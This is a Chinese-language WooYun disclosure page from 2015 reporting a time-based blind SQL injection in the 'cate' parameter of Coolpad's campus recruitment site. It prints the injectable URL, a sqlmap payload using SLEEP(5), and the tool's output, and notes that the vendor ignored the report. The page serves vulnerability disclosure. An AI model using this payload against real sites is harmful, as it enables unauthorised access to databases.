当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138407

漏洞标题:酷派某站存在SQL盲注漏洞可获取数据库信息

相关厂商:yulong.com

漏洞作者: 大饭刚

提交时间:2015-09-01 17:42

修复时间:2015-09-06 17:44

公开时间:2015-09-06 17:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-01: 细节已通知厂商并且等待厂商处理中
2015-09-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

前人挖洞,后人继续挖洞

详细说明:

WooYun: 酷派某站一处SQL注入
看到这个漏洞,我就去找了一下,发现还是存在注入,我在想,到底有没有整改就公开了。
注入url
http://campus.coolpad.com/index.php?c=schoolRecruitment&cate=1%0a&f=jobPosition&id=dKSg

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: cate
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: c=schoolRecruitment&cate=1
' AND SLEEP(5) AND 'dqRt'='dqRt&f=jobPosition&id=dKSg
---
[16:52:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.5.10
back-end DBMS: MySQL 5.0.11


123.jpg


漏洞证明:

123.jpg


可以得到库名

cool.png


就不继续下去了。

修复方案:

cate 参数依然没有过滤好

版权声明:转载请注明来源 大饭刚@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-06 17:44

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2015-09-01 17:57 | 大饭刚 ( 实习白帽子 | Rank:49 漏洞数:10 | 吃饭,喝酒,挖洞洞)

    最后一个图不是我提交的,啥情况?

  2. 2015-09-02 08:45 | janepeak520 ( 路人 | Rank:21 漏洞数:4 | janepeak是我的真爱(。・ˍ・。))

    666666666

  3. 2015-09-06 18:54 | 西西 ( 路人 | Rank:14 漏洞数:7 | 走过路过不会错过!)

    @目测审核传的 让注入更有说服力